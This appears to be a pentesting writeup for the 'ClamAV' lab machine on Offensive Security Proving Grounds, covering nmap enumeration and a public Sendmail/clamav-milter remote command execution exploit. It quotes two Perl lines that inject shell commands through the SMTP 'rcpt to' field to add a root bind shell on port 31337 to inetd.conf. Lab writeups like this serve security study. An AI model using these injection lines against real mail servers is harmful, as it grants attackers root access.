👨‍💻
Pentesting
HomePlaygroundCTFsBuy Me a Flag 🚩
  • Zeyu's OSCP Writeups
  • Home
  • CTF Writeups
  • Playground
  • Blog Posts
    • My OSCP Journey: How I Tried Harder
  • Proving Grounds
    • Warm Up
      • Pebbles
      • Twiggy
      • Bratarina
      • Internal
      • ClamAV
    • Get to Work
      • Nibbles
      • Nickel
      • WebCal
      • Authby
      • Pelican
      • Jacko
      • Medjed
      • XposedAPI
    • Try Harder
      • Meathead
  • Hack the Box
    • Easy
      • ScriptKiddie
      • Delivery
      • Laboratory
      • Academy
      • Sense
    • Medium
      • Cronos
      • Jeeves
Powered by GitBook
On this page
  • Information Gathering
  • Service Enumeration
  • HTTP (80)
  • SMTP (25)
  • Exploitation

Was this helpful?

  1. Proving Grounds
  2. Warm Up

ClamAV

Writeup for ClamAV from Offensive Security Proving Grounds (PG)

PreviousInternalNextGet to Work

Last updated 3 years ago

Was this helpful?

Information Gathering

Service Enumeration

nmapAutomator.sh -H 192.168.66.42 -t full

nmapAutomator.sh -H 192.168.66.42 -t vulns

HTTP (80)

There is a page with a binary message.

Challenge accepted!

SMTP (25)

We can see that Sendmail 8.13.4 is used.

Exploitation

We find the following Sendmail + ClamAV RCE exploit:

The two lines in the Perl script:

print $sock "rcpt to: <nobody+\"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf\"@localhost>\r\n";
print $sock "rcpt to: <nobody+\"|/etc/init.d/inetd restart\"@localhost>\r\n";

appear to open port 31337 as a root shell.

After running the script, the port is indeed open.

Upon connecting to the bind shell, use bash -i to upgrade to a fully interactive shell.

Sendmail with clamav-milter < 0.91.2 - Remote Command ExecutionExploit Database
Logo